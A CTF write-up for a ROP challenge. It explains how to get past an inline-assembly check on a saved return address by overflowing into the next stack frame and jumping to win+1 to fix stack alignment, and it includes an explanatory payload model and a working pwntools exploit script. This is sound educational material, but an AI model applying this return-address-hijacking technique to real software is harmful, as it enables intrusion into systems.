Tags: pwn rop 

Rating:

This was a ROP challenge with a small twist.

The vulnerable function had some inline assembly that checked its saved return address before returning, so that slot could not simply be pointed at a gadget or at `win`. Thankfully the buffer overflow was large enough that we could keep writing past that slot into the next stack frame, whose return address had no validation at all: the checked slot gets a legitimate value and the hijack happens one frame later.

There was one other minor detail. There was a stack alignment issue when the `win` function called libc. To fix that I just ignored the initial `push rbp` in the win function. You could also write an extra `ret` in the ROP chain.
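To make the two points above concrete, here is an added example (not the challenge's solve script and not pwntools code) that builds the same payload layout with plain `struct` and models why both alignment fixes work. Only the accepted return address `0x401284` and the 18-byte offset come from the solve script below; `WIN`, `RET_GADGET`, the prologue bytes and the stack address used in the check are made-up placeholders for a hypothetical binary. It also covers the "extra ret" variant and the unfixed case, which the writeup mentions but does not show.

```python
import struct

# Added example, not the challenge binary or its solve script.
# VALID_RET and PADDING come from the writeup; everything else is a placeholder.
VALID_RET = 0x401284        # return address the inline-asm check accepts
PADDING = 18                # bytes from the overflowed buffer to that checked slot
WIN = 0x401200              # hypothetical: address of win()
RET_GADGET = 0x40101a       # hypothetical: a lone 'ret' gadget
FAKE_RBP = 0xdeadbeef       # saved-rbp slot of the unchecked frame (any value)

# Constructed prologue for the hypothetical win(): push rbp; mov rbp,rsp; sub rsp,0x10
WIN_PROLOGUE = bytes.fromhex("55" "4889e5" "4883ec10")

FIXES = ("skip_push_rbp", "extra_ret", "none")


def p64(value):
    """Little-endian 8-byte pack, the same shape as pwn.p64."""
    return struct.pack("<Q", value)


def entry_offset(fix):
    """How many bytes into win() execution starts: 1 skips the 1-byte 'push rbp'."""
    if fix not in FIXES:
        raise ValueError(fix)
    return 1 if fix == "skip_push_rbp" else 0


def skips_only_push_rbp(fix):
    """Sanity check before using win+1: byte 0 must be 0x55 (push rbp),
    otherwise win+1 would land in the middle of an instruction."""
    off = entry_offset(fix)
    return off == 0 or (off == 1 and WIN_PROLOGUE[0] == 0x55)


def build_payload(fix="skip_push_rbp"):
    """Overflow past the checked return address into the next frame.

    Layout: [padding][checked ret := VALID_RET][next frame's saved rbp][next frame's ret]
    Only the first qword after the padding is inspected by the check, so it
    gets a legitimate value and the real target goes one frame later.
    """
    if not skips_only_push_rbp(fix):
        raise ValueError("win() does not start with push rbp; cannot skip it")
    chain = [VALID_RET, FAKE_RBP]
    if fix == "skip_push_rbp":
        chain.append(WIN + 1)           # enter win after its 'push rbp'
    elif fix == "extra_ret":
        chain += [RET_GADGET, WIN]      # extra 'ret' shifts rsp by 8 instead
    else:
        chain.append(WIN)               # no fix: libc call will be misaligned
    return b"A" * PADDING + b"".join(p64(a) for a in chain)


def slots(payload):
    """Decode the qwords after the padding; slots[0] is what the check sees."""
    body = payload[PADDING:]
    return [struct.unpack("<Q", body[i:i + 8])[0] for i in range(0, len(body), 8)]


def rsp_mod16_at_libc_call(ret_slot, fix):
    """Model rsp mod 16 at win's first 'call', given the address of the
    unchecked frame's return-address slot. In a normal frame that slot sits at
    rsp % 16 == 8, so pass such an address. The SysV ABI needs rsp % 16 == 0
    at the call; otherwise libc's 16-byte SSE stores (movaps) fault."""
    rsp = ret_slot + 8                  # the unchecked frame's 'ret' pops our target
    if fix == "extra_ret":
        rsp += 8                        # the ret gadget pops once more before win
    if entry_offset(fix) == 0:
        rsp -= 8                        # 'push rbp' runs because we entered at win+0
    # 'mov rbp, rsp' leaves rsp alone; 'sub rsp, 0x10' keeps the residue mod 16
    return rsp % 16
```

Run `rsp_mod16_at_libc_call(0x7ffc0008, fix)` for each of the three fixes: only `"none"` leaves rsp at 8 mod 16 at the libc call, which is exactly the crash the writeup worked around. The skip-`push rbp` variant is one qword shorter than the extra-`ret` variant, which matters when the overflow length is tight.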

```python
import pwn
import warnings

warnings.filterwarnings(action='ignore', category=BytesWarning)

elf = pwn.ELF("./out")
pwn.context.binary = elf
pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])

libc = elf.libc

# Either a local process for debugging or the remote challenge instance,
# not both (a stray local process was being spawned and then abandoned).
# p = elf.process()
p = pwn.remote("tjc.tf", 31080)

# Start
# pwn.gdb.attach(p, "b *pwnable+70")

# 18 bytes of padding reach the checked return-address slot. Give it a valid
# value (0x401284) so the inline-asm check passes, then keep writing into the
# next frame, whose saved rbp and return address are not checked.
# win+1 skips win's initial "push rbp" so rsp stays 16-byte aligned when win
# calls into libc (an extra 'ret' gadget in the chain would also fix that).
payload = pwn.cyclic(18)
payload += pwn.p64(0x401284)                 # checked slot: a valid return address
payload += pwn.p64(0xdeadbeef)               # next frame's saved rbp (any value)
payload += pwn.p64(elf.symbols['win'] + 1)   # next frame's return address, minus push rbp
p.sendafter(b"> ", payload)
p.interactive()
```

Original writeup (https://youtu.be/AqV3YUtcKGU?t=1751).